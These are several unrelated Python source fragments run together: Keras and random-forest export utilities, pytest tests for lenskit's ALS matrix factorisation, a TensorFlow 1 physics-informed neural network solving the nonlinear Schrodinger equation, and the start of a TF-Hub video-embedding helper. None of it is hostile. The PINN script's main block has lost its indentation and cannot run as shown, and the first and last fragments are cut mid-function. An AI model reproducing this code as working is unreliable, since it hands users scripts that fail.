            filename: Name of the neural network file.

        Returns:
        """
        nn_ds = xr.Dataset()
        num_dense = 0
        layer_names = []
        for layer in self.model.layers:
            # only Dense layers carry weights the Fortran reader needs
            if "dense" in layer.name:
                layer_names.append(layer.name)
                dense_weights = layer.get_weights()
                nn_ds[layer.name + "_weights"] = ((layer.name + "_in", layer.name + "_out"), dense_weights[0])
                nn_ds[layer.name + "_bias"] = ((layer.name + "_out",), dense_weights[1])
                nn_ds[layer.name + "_weights"].attrs["name"] = layer.name
                nn_ds[layer.name + "_weights"].attrs["activation"] = layer.get_config()["activation"]
                num_dense += 1
        nn_ds["layer_names"] = (("num_layers",), np.array(layer_names))
        nn_ds.attrs["num_layers"] = num_dense
        nn_ds.to_netcdf(filename, encoding={'layer_names': {'dtype': 'S1'}})
        return

    def predict(self, x):
        """Return predictions; class labels when classifier=True, else values."""
        if self.classifier:
            y_prob = self.model.predict(x, batch_size=self.batch_size)
            # map argmax class index back to the original label values
            y_out = self.y_labels[np.argmax(y_prob, axis=1)].ravel()
        else:
            y_out = self.model.predict(x, batch_size=self.batch_size).ravel()
        return y_out

    def predict_proba(self, x):
        """Return raw model outputs (class probabilities for classifiers)."""
        y_prob = self.model.predict(x, batch_size=self.batch_size)
        return y_prob
def save_scaler_csv(scaler_obj, input_columns, output_file):
    """
    Persist a fitted scaler's parameters as a CSV table.

    Args:
        scaler_obj: Scikit-learn StandardScaler object (must be fitted)
        input_columns: labels for the scaled inputs, used as the row index
        output_file: path or buffer the CSV table is written to

    Returns:
        pandas.DataFrame: the table that was written, indexed by input column.
    """
    scaler_table = pd.DataFrame(
        {"mean": scaler_obj.mean_, "scale": scaler_obj.scale_},
        index=input_columns,
    )
    scaler_table.to_csv(output_file, index_label="input")
    return scaler_table
def save_random_forest_csv(random_forest_model, features, out_path, forest_name="random_forest"):
    """
    Converts a scikit-learn random forest object into a set of csv files for each tree in the forest. If the
    specified directory does not currently exist, the function will create it.

    Args:
        random_forest_model: scikit learn RandomForestRegressor or RandomForestClassifier
        features: list or array of feature names in the order of training
        out_path: Path to directory containing random forest csv files.
        forest_name: Name of the forest model

    Returns:
    """
    forest_dir = join(out_path, forest_name)
    if not exists(forest_dir):
        os.makedirs(forest_dir)
    # record the feature ordering used at training time
    pd.DataFrame(features, columns=["feature"]).to_csv(
        join(forest_dir, f"{forest_name}_features.csv"), index_label="Index")
    tree_tables = random_forest_dataframes(random_forest_model, features)
    # tree_files.csv acts as a manifest listing one csv per tree
    with open(join(forest_dir, "tree_files.csv"), "w") as manifest:
        for tree_number, tree_table in enumerate(tree_tables):
            tree_name = f"{forest_name}_tree_{tree_number:04d}.csv"
            tree_table.to_csv(join(forest_dir, tree_name), float_format='%1.16e',
                              index_label="Node")
            manifest.write(tree_name + "\n")
    return
def random_forest_dataframes(random_forest_model, feature_names):
    """Convert every estimator in a fitted forest to a DataFrame table.

    Args:
        random_forest_model: fitted scikit-learn random forest.
        feature_names: feature names in training order, passed through to
            decision_tree_dataframe.

    Returns:
        list of pandas.DataFrame, one per tree, in estimator order.
    """
    return [decision_tree_dataframe(estimator, feature_names=feature_names)
            for estimator in random_forest_model.estimators_]
def decision_tree_dataframe(decision_tree_model, feature_names=None):
    """
    Extracts the attributes of a decision tree into a DataFrame

    Args:
        decision_tree_model: scikit-learn DecisionTree object
        feature_names: array of names for each input feature in the order they were put into the tree

    Returns:
        :class:`pandas.DataFrame` : The decision tree represented as a table.
    """
    tree = decision_tree_model.tree_
    tree_dict = {}
    # one column per node attribute; feature_name added only when names given
    tree_vars = ["feature", "threshold", "value", "children_left", "children_right", "impurity"]
    if feature_names is not None:
        tree_vars.append("feature_name")
    for tree_var in tree_vars:
        if tree_var == "value":
            if tree.value.shape[2] > 1:
                # Assumes the tree value contains the number of instances in each class
                # Calculates the probability of the second class assuming the classes are 0 and 1
                tree_dict[tree_var] = tree.value[:, 0, 1] / tree.value[:, 0].sum(axis=1)
            else:
                tree_dict[tree_var] = tree.value[:, 0, 0]
        elif tree_var == "feature_name":
            feature_idx = getattr(tree, "feature")
            # normalize sklearn's leaf markers (e.g. -2) to -1 before indexing
            # NOTE(review): this assignment writes into the array returned by
            # tree.feature — confirm sklearn returns a copy here, otherwise
            # the fitted tree is mutated in place.
            feature_idx[feature_idx < 0] = -1
            tree_dict[tree_var] = np.where(feature_idx >= 0, feature_names[feature_idx], "leaf node__")
        else:
            tree_dict[tree_var] = getattr(tree, tree_var)
    tree_frame = pd.DataFrame(tree_dict, columns=tree_vars)
    return tree_frame
def predict_decision_tree_frame(input_data, dt_frame):
    """
    Generate predictions for a single example from a decision tree.

    Walks the table from the root (node 0), branching right when the
    example's feature value exceeds the node threshold, until a leaf
    (negative feature index) is reached.

    Args:
        input_data: 1D array of input data
        dt_frame: Decision tree in table format

    Returns:
        float: predicted value for input_data from tree.
    """
    node = 0
    while True:
        result = dt_frame.loc[node, "value"]
        feature_index = dt_frame.loc[node, "feature"]
        if feature_index < 0:
            # negative feature index marks a leaf node
            return result
        exceeds = input_data[feature_index] > dt_frame.loc[node, "threshold"]
        branch = "children_right" if exceeds else "children_left"
        node = dt_frame.loc[node, branch]
|
import logging
import pickle
# get a usable pickle disassembler
# stdlib pickletools can only disassemble protocol-5 pickles on Pythons whose
# pickle supports protocol 5; otherwise try the pickle5 backport.
if pickle.HIGHEST_PROTOCOL >= 5:
    from pickletools import dis as pickle_dis
else:
    try:
        from pickle5.pickletools import dis as pickle_dis
    except ImportError:
        # pickle_dis stays undefined; only the binpickle test uses it
        pass
from lenskit.algorithms import als
from lenskit import util
import pandas as pd
import numpy as np
from pytest import approx, mark
from lenskit.util import Stopwatch
import lenskit.util.test as lktu
# binpickle is optional; tests that need it are skipped when it is missing
try:
    import binpickle
except ImportError:
    binpickle = None
_log = logging.getLogger(__name__)
# minimal ratings frame: 3 users (10, 12, 13) x 3 items (1, 2, 3), 4 ratings
simple_df = pd.DataFrame({'item': [1, 1, 2, 3],
                          'user': [10, 12, 10, 13],
                          'rating': [4.0, 3.0, 5.0, 2.0]})
# run each decorated test once per ALS solver implementation
methods = mark.parametrize('m', ['lu', 'cd'])
@methods
def test_als_basic_build(m):
    """Fitting BiasedMF on the tiny frame yields correctly-shaped factors."""
    model = als.BiasedMF(20, iterations=10, progress=util.no_progress, method=m)
    model.fit(simple_df)
    assert model.bias.mean_ == approx(simple_df.rating.mean())
    assert set(model.user_index_) == {10, 12, 13}
    assert set(model.item_index_) == {1, 2, 3}
    assert model.user_features_.shape == (3, 20)
    assert model.item_features_.shape == (3, 20)
    assert model.n_features == 20
    assert model.n_users == 3
    assert model.n_items == 3
@methods
def test_als_no_bias(m):
    """With bias disabled the model still fits and produces predictions."""
    model = als.BiasedMF(20, iterations=10, bias=None, method=m)
    model.fit(simple_df)
    assert model.bias is None
    assert set(model.user_index_) == {10, 12, 13}
    assert set(model.item_index_) == {1, 2, 3}
    assert model.user_features_.shape == (3, 20)
    assert model.item_features_.shape == (3, 20)
    preds = model.predict_for_user(10, [3])
    assert len(preds) == 1
@methods
def test_als_predict_basic(m):
    """A prediction for a known user/item pair stays near the rating scale."""
    model = als.BiasedMF(20, iterations=10, method=m)
    model.fit(simple_df)
    assert model.bias.mean_ == approx(simple_df.rating.mean())
    preds = model.predict_for_user(10, [3])
    assert len(preds) == 1
    assert preds.index[0] == 3
    assert -0.1 <= preds.loc[3] <= 5.1
def test_als_predict_basic_for_new_ratings():
    """Predicting for an unseen user from ad-hoc ratings stays in range."""
    model = als.BiasedMF(20, iterations=10)
    model.fit(simple_df)
    assert model.bias.mean_ == approx(simple_df.rating.mean())
    # items as index and ratings as values
    fresh_ratings = pd.Series([4.0, 5.0], index=[1, 2])
    preds = model.predict_for_user(15, [3], fresh_ratings)
    assert len(preds) == 1
    assert preds.index[0] == 3
    assert -0.1 <= preds.loc[3] <= 5.1
def test_als_predict_basic_for_new_user_with_new_ratings():
    """A fresh user with the same history predicts close to the known user."""
    user, item = 10, 3
    model = als.BiasedMF(20, iterations=10)
    model.fit(simple_df)
    known_preds = model.predict_for_user(user, [item])
    # items as index and ratings as values
    fresh_ratings = pd.Series([4.0, 5.0], index=[1, 2])
    fresh_preds = model.predict_for_user(-1, [item], fresh_ratings)
    assert known_preds.loc[item] == approx(fresh_preds.loc[item], rel=9e-2)
def test_als_predict_for_new_users_with_new_ratings():
    """For several sampled real users, predicting via a fresh user id plus
    that user's full rating history should approximate the fitted-user
    predictions (within 9% relative tolerance)."""
    n_users = 3
    n_items = 2
    new_u_id = -1
    ratings = lktu.ml_test.ratings
    np.random.seed(45)
    # sample real users/items from the MovieLens test ratings
    users = np.random.choice(ratings.user.unique(), n_users)
    items = np.random.choice(ratings.item.unique(), n_items)
    algo = als.BiasedMF(20, iterations=10, method="lu")
    algo.fit(ratings)
    _log.debug("Items: " + str(items))
    for u in users:
        _log.debug(f"user: {u}")
        preds = algo.predict_for_user(u, items)
        user_data = ratings[ratings.user == u]
        _log.debug("user_features from fit: " + str(algo.user_features_[algo.user_index_.get_loc(u), :]))
        new_ratings = pd.Series(user_data.rating.to_numpy(), index=user_data.item)  # items as index and ratings as values
        new_preds = algo.predict_for_user(new_u_id, items, new_ratings)
        _log.debug("preds: " + str(preds.values))
        _log.debug("new_preds: " + str(new_preds.values))
        _log.debug("------------")
        assert new_preds.values == approx(preds.values, rel=9e-2)
def test_als_predict_bad_item():
    """Predicting an item the model never saw yields a single NaN entry."""
    model = als.BiasedMF(20, iterations=10)
    model.fit(simple_df)
    assert model.bias.mean_ == approx(simple_df.rating.mean())
    preds = model.predict_for_user(10, [4])
    assert len(preds) == 1
    assert preds.index[0] == 4
    assert np.isnan(preds.loc[4])
def test_als_predict_bad_user():
    """Predicting for a user the model never saw yields a single NaN entry."""
    model = als.BiasedMF(20, iterations=10)
    model.fit(simple_df)
    assert model.bias.mean_ == approx(simple_df.rating.mean())
    preds = model.predict_for_user(50, [3])
    assert len(preds) == 1
    assert preds.index[0] == 3
    assert np.isnan(preds.loc[3])
@lktu.wantjit
@mark.slow
def test_als_train_large():
    """Fit on the MovieLens test set; verify dimensions and item biases."""
    model = als.BiasedMF(20, iterations=10)
    ratings = lktu.ml_test.ratings
    model.fit(ratings)
    assert model.bias.mean_ == approx(ratings.rating.mean())
    assert model.n_features == 20
    assert model.n_items == ratings.item.nunique()
    assert model.n_users == ratings.user.nunique()
    # recompute damped item means (damping factor 5) from scratch and
    # compare against the fitted item bias offsets
    icounts = ratings.groupby('item').rating.count()
    isums = ratings.groupby('item').rating.sum()
    resid_sums = isums - icounts * ratings.rating.mean()
    damped_means = resid_sums / (icounts + 5)
    ibias = pd.Series(model.bias.item_offsets_, index=model.item_index_)
    damped_means, ibias = damped_means.align(ibias)
    assert ibias.values == approx(damped_means.values)
# don't use wantjit, use this to do a non-JIT test
def test_als_save_load():
    """Round-trip a fitted model through pickle and compare all learned state."""
    original = als.BiasedMF(5, iterations=5, method='lu')
    ratings = lktu.ml_test.ratings
    original.fit(ratings)
    assert original.bias.mean_ == approx(ratings.rating.mean())

    blob = pickle.dumps(original)
    _log.info('serialized to %d bytes', len(blob))
    restored = pickle.loads(blob)

    assert restored.bias.mean_ == original.bias.mean_
    for attr in ('user_offsets_', 'item_offsets_'):
        assert np.all(getattr(restored.bias, attr) == getattr(original.bias, attr))
    for attr in ('user_features_', 'item_features_', 'item_index_', 'user_index_'):
        assert np.all(getattr(restored, attr) == getattr(original, attr))
@mark.skipif(not binpickle, reason='binpickle not available')
def test_als_binpickle(tmp_path):
    "Test saving ALS with BinPickle"
    original = als.BiasedMF(20, iterations=5, method='lu')
    ratings = lktu.ml_test.ratings
    original.fit(ratings)
    assert original.bias.mean_ == approx(ratings.rating.mean())

    file = tmp_path / 'als.bpk'
    binpickle.dump(original, file)

    with binpickle.BinPickleFile(file) as bpf:
        # the pickle payload itself (the last entry) should stay small
        last = bpf.entries[-1]
        _log.info('serialized to %d pickle bytes', last.dec_length)
        pickle_dis(bpf._read_buffer(last))
        assert last.dec_length < 2048

        algo = bpf.load()
        assert algo.bias.mean_ == original.bias.mean_
        for attr in ('user_offsets_', 'item_offsets_'):
            assert np.all(getattr(algo.bias, attr) == getattr(original.bias, attr))
        for attr in ('user_features_', 'item_features_', 'item_index_', 'user_index_'):
            assert np.all(getattr(algo, attr) == getattr(original, attr))
@lktu.wantjit
@mark.slow
def test_als_method_match():
    """Train the LU and CD solvers on the same data and check they agree.

    Both solvers are fit with the same RNG seed, then compared on sampled
    user/item predictions.  The check is that 90% of the absolute
    differences across *all* sampled predictions are under about a
    quarter star.
    """
    lu = als.BiasedMF(20, iterations=15, reg=(2, 0.001), method='lu', rng_spec=42)
    cd = als.BiasedMF(20, iterations=20, reg=(2, 0.001), method='cd', rng_spec=42)

    ratings = lktu.ml_test.ratings

    timer = Stopwatch()
    lu.fit(ratings)
    timer.stop()
    _log.info('fit with LU solver in %s', timer)

    timer = Stopwatch()
    cd.fit(ratings)
    timer.stop()
    _log.info('fit with CD solver in %s', timer)

    assert lu.bias.mean_ == approx(ratings.rating.mean())
    assert cd.bias.mean_ == approx(ratings.rating.mean())

    preds = []

    rng = util.rng(42, legacy=True)
    for u in rng.choice(np.unique(ratings.user), 15, replace=False):
        items = rng.choice(np.unique(ratings.item), 15, replace=False)
        lu_preds = lu.predict_for_user(u, items)
        cd_preds = cd.predict_for_user(u, items)
        diff = lu_preds - cd_preds
        adiff = np.abs(diff)
        _log.info('user %s diffs: L2 = %f, min = %f, med = %f, max = %f, 90%% = %f', u,
                  np.linalg.norm(diff, 2),
                  np.min(adiff), np.median(adiff), np.max(adiff), np.quantile(adiff, 0.9))

        preds.append(pd.DataFrame({
            'user': u,
            'item': items,
            'lu': lu_preds,
            'cd': cd_preds,
            'adiff': adiff
        }))

    preds = pd.concat(preds, ignore_index=True)
    _log.info('LU preds:\n%s', preds.lu.describe())
    _log.info('CD preds:\n%s', preds.cd.describe())
    _log.info('overall differences:\n%s', preds.adiff.describe())
    # there are differences. our check: the 90% are under a quarter star
    # BUG FIX: the original asserted on `adiff`, which only holds the *last*
    # user's differences; use the combined frame to check all predictions.
    assert np.quantile(preds.adiff, 0.9) <= 0.27
@mark.slow
@mark.eval
@mark.skipif(not lktu.ml100k.available, reason='ML100K data not present')
def test_als_batch_accuracy():
    """Cross-validate both ALS solvers on ML100K and check predictive accuracy."""
    from lenskit.algorithms import bias
    import lenskit.crossfold as xf
    import lenskit.metrics.predict as pm

    ratings = lktu.ml100k.ratings

    lu_algo = als.BiasedMF(25, iterations=20, damping=5, method='lu')
    cd_algo = als.BiasedMF(25, iterations=25, damping=5, method='cd')
    # algo = bias.Fallback(svd_algo, bias.Bias(damping=5))

    # renamed from `eval` to avoid shadowing the builtin
    def eval_fold(train, test):
        """Fit both solvers on a fold and score the test ratings."""
        _log.info('training LU')
        lu_algo.fit(train)
        _log.info('training CD')
        cd_algo.fit(train)
        _log.info('testing %d users', test.user.nunique())
        return test.assign(lu_pred=lu_algo.predict(test), cd_pred=cd_algo.predict(test))

    folds = xf.partition_users(ratings, 5, xf.SampleFrac(0.2))
    preds = pd.concat(eval_fold(train, test) for (train, test) in folds)
    preds['abs_diff'] = np.abs(preds.lu_pred - preds.cd_pred)
    _log.info('predictions:\n%s', preds.sort_values('abs_diff', ascending=False))
    _log.info('diff summary:\n%s', preds.abs_diff.describe())

    lu_mae = pm.mae(preds.lu_pred, preds.rating)
    assert lu_mae == approx(0.73, abs=0.045)
    cd_mae = pm.mae(preds.cd_pred, preds.rating)
    assert cd_mae == approx(0.73, abs=0.045)

    user_rmse = preds.groupby('user').apply(lambda df: pm.rmse(df.lu_pred, df.rating))
    assert user_rmse.mean() == approx(0.94, abs=0.05)
    user_rmse = preds.groupby('user').apply(lambda df: pm.rmse(df.cd_pred, df.rating))
    assert user_rmse.mean() == approx(0.94, abs=0.05)
|
"""
@author: Maziar Raissi
"""
import sys
sys.path.insert(0, "../../Utilities/")
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import scipy.io
from scipy.interpolate import griddata
from pyDOE import lhs
from plotting import newfig, savefig
from mpl_toolkits.mplot3d import Axes3D
import time
import matplotlib.gridspec as gridspec
from mpl_toolkits.axes_grid1 import make_axes_locatable
# Fix both NumPy's and TensorFlow's RNGs so runs are reproducible.
np.random.seed(1234)
tf.set_random_seed(1234)
class PhysicsInformedNN:
    """Physics-informed neural network (TF1 graph/session API).

    The network maps (x, t) to (u, v).  Given the residual definitions in
    ``net_f_uv``, these correspond to the real and imaginary parts of a
    complex field h = u + i*v satisfying i*h_t + 0.5*h_xx + |h|^2*h = 0
    (a nonlinear Schrodinger equation).  The loss combines:
      * the initial-condition misfit at t = 0 (x0, u0, v0),
      * periodic boundary conditions: values and x-derivatives must match
        at x = lb[0] and x = ub[0] for the boundary times tb,
      * the PDE residual at the collocation points X_f.
    Training runs Adam first, then L-BFGS-B via the SciPy interface.
    """

    # Initialize the class
    def __init__(self, x0, u0, v0, tb, X_f, layers, lb, ub):
        # Assemble (x, t) coordinate pairs for each constraint set.
        X0 = np.concatenate((x0, 0 * x0), 1)  # (x0, 0): initial time slice
        X_lb = np.concatenate((0 * tb + lb[0], tb), 1)  # (lb[0], tb): lower boundary
        X_ub = np.concatenate((0 * tb + ub[0], tb), 1)  # (ub[0], tb): upper boundary

        # Domain bounds, used to normalize network inputs in neural_net().
        self.lb = lb
        self.ub = ub

        self.x0 = X0[:, 0:1]
        self.t0 = X0[:, 1:2]
        self.x_lb = X_lb[:, 0:1]
        self.t_lb = X_lb[:, 1:2]
        self.x_ub = X_ub[:, 0:1]
        self.t_ub = X_ub[:, 1:2]
        self.x_f = X_f[:, 0:1]
        self.t_f = X_f[:, 1:2]

        # Target values of (u, v) at t = 0.
        self.u0 = u0
        self.v0 = v0

        # Initialize NNs
        self.layers = layers
        self.weights, self.biases = self.initialize_NN(layers)

        # tf Placeholders (one pair per constraint set, fed in train()/predict())
        self.x0_tf = tf.placeholder(tf.float32, shape=[None, self.x0.shape[1]])
        self.t0_tf = tf.placeholder(tf.float32, shape=[None, self.t0.shape[1]])
        self.u0_tf = tf.placeholder(tf.float32, shape=[None, self.u0.shape[1]])
        self.v0_tf = tf.placeholder(tf.float32, shape=[None, self.v0.shape[1]])
        self.x_lb_tf = tf.placeholder(tf.float32, shape=[None, self.x_lb.shape[1]])
        self.t_lb_tf = tf.placeholder(tf.float32, shape=[None, self.t_lb.shape[1]])
        self.x_ub_tf = tf.placeholder(tf.float32, shape=[None, self.x_ub.shape[1]])
        self.t_ub_tf = tf.placeholder(tf.float32, shape=[None, self.t_ub.shape[1]])
        self.x_f_tf = tf.placeholder(tf.float32, shape=[None, self.x_f.shape[1]])
        self.t_f_tf = tf.placeholder(tf.float32, shape=[None, self.t_f.shape[1]])

        # tf Graphs
        self.u0_pred, self.v0_pred, _, _ = self.net_uv(self.x0_tf, self.t0_tf)
        (
            self.u_lb_pred,
            self.v_lb_pred,
            self.u_x_lb_pred,
            self.v_x_lb_pred,
        ) = self.net_uv(self.x_lb_tf, self.t_lb_tf)
        (
            self.u_ub_pred,
            self.v_ub_pred,
            self.u_x_ub_pred,
            self.v_x_ub_pred,
        ) = self.net_uv(self.x_ub_tf, self.t_ub_tf)
        self.f_u_pred, self.f_v_pred = self.net_f_uv(self.x_f_tf, self.t_f_tf)

        # Loss: initial condition + periodic BCs (values and slopes) + PDE residual
        self.loss = (
            tf.reduce_mean(tf.square(self.u0_tf - self.u0_pred))
            + tf.reduce_mean(tf.square(self.v0_tf - self.v0_pred))
            + tf.reduce_mean(tf.square(self.u_lb_pred - self.u_ub_pred))
            + tf.reduce_mean(tf.square(self.v_lb_pred - self.v_ub_pred))
            + tf.reduce_mean(tf.square(self.u_x_lb_pred - self.u_x_ub_pred))
            + tf.reduce_mean(tf.square(self.v_x_lb_pred - self.v_x_ub_pred))
            + tf.reduce_mean(tf.square(self.f_u_pred))
            + tf.reduce_mean(tf.square(self.f_v_pred))
        )

        # Optimizers: L-BFGS-B refinement (run after the Adam loop in train())
        self.optimizer = tf.contrib.opt.ScipyOptimizerInterface(
            self.loss,
            method="L-BFGS-B",
            options={
                "maxiter": 50000,
                "maxfun": 50000,
                "maxcor": 50,
                "maxls": 50,
                "ftol": 1.0 * np.finfo(float).eps,
            },
        )

        self.optimizer_Adam = tf.train.AdamOptimizer()
        self.train_op_Adam = self.optimizer_Adam.minimize(self.loss)

        # tf session
        self.sess = tf.Session(
            config=tf.ConfigProto(allow_soft_placement=True, log_device_placement=True)
        )

        init = tf.global_variables_initializer()
        self.sess.run(init)

    def initialize_NN(self, layers):
        """Create Xavier-initialized weights and zero biases for each layer pair."""
        weights = []
        biases = []
        num_layers = len(layers)
        for l in range(0, num_layers - 1):
            W = self.xavier_init(size=[layers[l], layers[l + 1]])
            b = tf.Variable(
                tf.zeros([1, layers[l + 1]], dtype=tf.float32), dtype=tf.float32
            )
            weights.append(W)
            biases.append(b)
        return weights, biases

    def xavier_init(self, size):
        """Return a weight Variable drawn with Xavier/Glorot scaling."""
        in_dim = size[0]
        out_dim = size[1]
        xavier_stddev = np.sqrt(2 / (in_dim + out_dim))
        return tf.Variable(
            tf.truncated_normal([in_dim, out_dim], stddev=xavier_stddev),
            dtype=tf.float32,
        )

    def neural_net(self, X, weights, biases):
        """Forward pass: inputs scaled to [-1, 1], tanh hidden layers, linear output."""
        num_layers = len(weights) + 1
        H = 2.0 * (X - self.lb) / (self.ub - self.lb) - 1.0
        for l in range(0, num_layers - 2):
            W = weights[l]
            b = biases[l]
            H = tf.tanh(tf.add(tf.matmul(H, W), b))
        W = weights[-1]
        b = biases[-1]
        Y = tf.add(tf.matmul(H, W), b)
        return Y

    def net_uv(self, x, t):
        """Predict (u, v) and their x-derivatives at the given coordinates."""
        X = tf.concat([x, t], 1)
        uv = self.neural_net(X, self.weights, self.biases)
        u = uv[:, 0:1]
        v = uv[:, 1:2]
        u_x = tf.gradients(u, x)[0]
        v_x = tf.gradients(v, x)[0]
        return u, v, u_x, v_x

    def net_f_uv(self, x, t):
        """PDE residuals; both components vanish for an exact solution of
        i*h_t + 0.5*h_xx + |h|^2*h = 0 with h = u + i*v."""
        u, v, u_x, v_x = self.net_uv(x, t)
        u_t = tf.gradients(u, t)[0]
        u_xx = tf.gradients(u_x, x)[0]
        v_t = tf.gradients(v, t)[0]
        v_xx = tf.gradients(v_x, x)[0]
        f_u = u_t + 0.5 * v_xx + (u ** 2 + v ** 2) * v
        f_v = v_t - 0.5 * u_xx - (u ** 2 + v ** 2) * u
        return f_u, f_v

    def callback(self, loss):
        # Progress hook invoked by the SciPy L-BFGS-B interface at each step.
        print("Loss:", loss)

    def train(self, nIter):
        """Run ``nIter`` Adam steps (logging every 10), then refine with L-BFGS-B."""
        tf_dict = {
            self.x0_tf: self.x0,
            self.t0_tf: self.t0,
            self.u0_tf: self.u0,
            self.v0_tf: self.v0,
            self.x_lb_tf: self.x_lb,
            self.t_lb_tf: self.t_lb,
            self.x_ub_tf: self.x_ub,
            self.t_ub_tf: self.t_ub,
            self.x_f_tf: self.x_f,
            self.t_f_tf: self.t_f,
        }
        start_time = time.time()
        for it in range(nIter):
            self.sess.run(self.train_op_Adam, tf_dict)
            # Print loss every 10 iterations (timer measures the 10-step window)
            if it % 10 == 0:
                elapsed = time.time() - start_time
                loss_value = self.sess.run(self.loss, tf_dict)
                print("It: %d, Loss: %.3e, Time: %.2f" % (it, loss_value, elapsed))
                start_time = time.time()
        self.optimizer.minimize(
            self.sess,
            feed_dict=tf_dict,
            fetches=[self.loss],
            loss_callback=self.callback,
        )

    def predict(self, X_star):
        """Evaluate (u, v) and the PDE residuals at the (x, t) rows of ``X_star``."""
        # The u0/v0 graph nodes double as general-purpose predictors here.
        tf_dict = {self.x0_tf: X_star[:, 0:1], self.t0_tf: X_star[:, 1:2]}
        u_star = self.sess.run(self.u0_pred, tf_dict)
        v_star = self.sess.run(self.v0_pred, tf_dict)
        tf_dict = {self.x_f_tf: X_star[:, 0:1], self.t_f_tf: X_star[:, 1:2]}
        f_u_star = self.sess.run(self.f_u_pred, tf_dict)
        f_v_star = self.sess.run(self.f_v_pred, tf_dict)
        return u_star, v_star, f_u_star, f_v_star
if __name__ == "__main__":
noise = 0.0
# Doman bounds
lb = np.array([-5.0, 0.0])
ub = np.array([5.0, np.pi / 2])
N0 = 50
N_b = 50
N_f = 20000
layers = [2, 100, 100, 100, 100, 2]
data = scipy.io.loadmat("../Data/NLS.mat")
t = data["tt"].flatten()[:, None]
x = data["x"].flatten()[:, None]
Exact = data["uu"]
Exact_u = np.real(Exact)
Exact_v = np.imag(Exact)
Exact_h = np.sqrt(Exact_u ** 2 + Exact_v ** 2)
X, T = np.meshgrid(x, t)
X_star = np.hstack((X.flatten()[:, None], T.flatten()[:, None]))
u_star = Exact_u.T.flatten()[:, None]
v_star = Exact_v.T.flatten()[:, None]
h_star = Exact_h.T.flatten()[:, None]
###########################
idx_x = np.random.choice(x.shape[0], N0, replace=False)
x0 = x[idx_x, :]
u0 = Exact_u[idx_x, 0:1]
v0 = Exact_v[idx_x, 0:1]
idx_t = np.random.choice(t.shape[0], N_b, replace=False)
tb = t[idx_t, :]
X_f = lb + (ub - lb) * lhs(2, N_f)
model = PhysicsInformedNN(x0, u0, v0, tb, X_f, layers, lb, ub)
start_time = time.time()
model.train(50000)
elapsed = time.time() - start_time
print("Training time: %.4f" % (elapsed))
u_pred, v_pred, f_u_pred, f_v_pred = model.predict(X_star)
h_pred = np.sqrt(u_pred ** 2 + v_pred ** 2)
error_u = np.linalg.norm(u_star - u_pred, 2) / np.linalg.norm(u_star, 2)
error_v = np.linalg.norm(v_star - v_pred, 2) / np.linalg.norm(v_star, 2)
error_h = np.linalg.norm(h_star - h_pred, 2) / np.linalg.norm(h_star, 2)
print("Error u: %e" % (error_u))
print("Error v: %e" % (error_v))
print("Error h: %e" % (error_h))
U_pred = griddata(X_star, u_pred.flatten(), (X, T), method="cubic")
V_pred = griddata(X_star, v_pred.flatten(), (X, T), method="cubic")
H_pred = griddata(X_star, h_pred.flatten(), (X, T), method="cubic")
FU_pred = griddata(X_star, f_u_pred.flatten(), (X, T), method="cubic")
FV_pred = griddata(X_star, f_v_pred.flatten(), (X, T), method="cubic")
######################################################################
############################# Plotting ###############################
######################################################################
X0 = np.concatenate((x0, 0 * x0), 1) # (x0, 0)
X_lb = np.concatenate((0 * tb + lb[0], tb), 1) # (lb[0], tb)
X_ub = np.concatenate((0 * tb + ub[0], tb), 1) # (ub[0], tb)
X_u_train = np.vstack([X0, X_lb, X_ub])
fig, ax = newfig(1.0, 0.9)
ax.axis("off")
####### Row 0: h(t,x) ##################
gs0 = gridspec.GridSpec(1, 2)
gs0.update(top=1 - 0.06, bottom=1 - 1 / 3, left=0.15, right=0.85, wspace=0)
ax = plt.subplot(gs0[:, :])
h = ax.imshow(
H_pred.T,
interpolation="nearest",
cmap="YlGnBu",
extent=[lb[1], ub[1], lb[0], ub[0]],
origin="lower",
aspect="auto",
)
divider = make_axes_locatable(ax)
cax = divider.append_axes("right", size="5%", pad=0.05)
fig.colorbar(h, cax=cax)
ax.plot(
X_u_train[:, 1],
X_u_train[:, 0],
"kx",
label="Data (%d points)" % (X_u_train.shape[0]),
markersize=4,
clip_on=False,
)
line = np.linspace(x.min(), x.max(), 2)[:, None]
ax.plot(t[75] * np.ones((2, 1)), line, "k--", linewidth=1)
ax.plot(t[100] * np.ones((2, 1)), line, "k--", linewidth=1)
ax.plot(t[125] * np.ones((2, 1)), line, "k--", linewidth=1)
ax.set_xlabel("$t$")
ax.set_ylabel("$x$")
leg = ax.legend(frameon=False, loc="best")
# plt.setp(leg.get_texts(), color='w')
ax.set_title("$|h(t,x)|$", fontsize=10)
####### Row 1: h(t,x) slices ##################
gs1 = gridspec.GridSpec(1, 3)
gs1.update(top=1 - 1 / 3, bottom=0, left=0.1, right=0.9, wspace=0.5)
ax = plt.subplot(gs1[0, 0])
ax.plot(x, Exact_h[:, 75], "b-", linewidth=2, label="Exact")
ax.plot(x, H_pred[75, :], "r--", linewidth=2, label="Prediction")
ax.set_xlabel("$x$")
ax.set_ylabel("$|h(t,x)|$")
ax.set_title("$t = %.2f$" % (t[75]), fontsize=10)
ax.axis("square")
ax.set_xlim([-5.1, 5.1])
ax.set_ylim([-0.1, 5.1])
ax = plt.subplot(gs1[0, 1])
ax.plot(x, Exact_h[:, 100], "b-", linewidth=2, label="Exact")
ax.plot(x, H_pred[100, :], "r--", linewidth=2, label="Prediction")
ax.set_xlabel("$x$")
ax.set_ylabel("$|h(t,x)|$")
ax.axis("square")
ax.set_xlim([-5.1, 5.1])
ax.set_ylim([-0.1, 5.1])
ax.set_title("$t = %.2f$" % (t[100]), fontsize=10)
ax.legend(loc="upper center", bbox_to_anchor=(0.5, -0.8), ncol=5, frameon=False)
ax = plt.subplot(gs1[0, 2])
ax.plot(x, Exact_h[:, 125], "b-", linewidth=2, label="Exact")
ax.plot(x, H_pred[125, :], "r--", linewidth=2, label="Prediction")
ax.set_xlabel("$x$")
ax.set_ylabel("$|h(t,x)|$")
ax.axis("square")
ax.set_xlim([-5.1, 5.1])
ax.set_ylim([-0.1, 5.1])
ax.set_title("$t = %.2f$" % (t[125]), fontsize=10)
# savefig('./figures/NLS')
|
import math
import os
import uuid
import cv2
import numpy as np
import tensorflow as tf
import tensorflow_hub as tfhub
from tensorflow.keras.utils import get_file
def produce_embeddings(model, input_frames, input_words):
    """Embed video clips and text queries with a two-signature hub model.

    Runs the model's 'video' signature on the frames (cast to float32) and
    its 'text' signature on the words, returning the two embedding tensors.
    """
    video_input = tf.constant(tf.cast(input_frames, dtype=tf.float32))
    video_embedding = model.signatures['video'](video_input)['video_embedding']

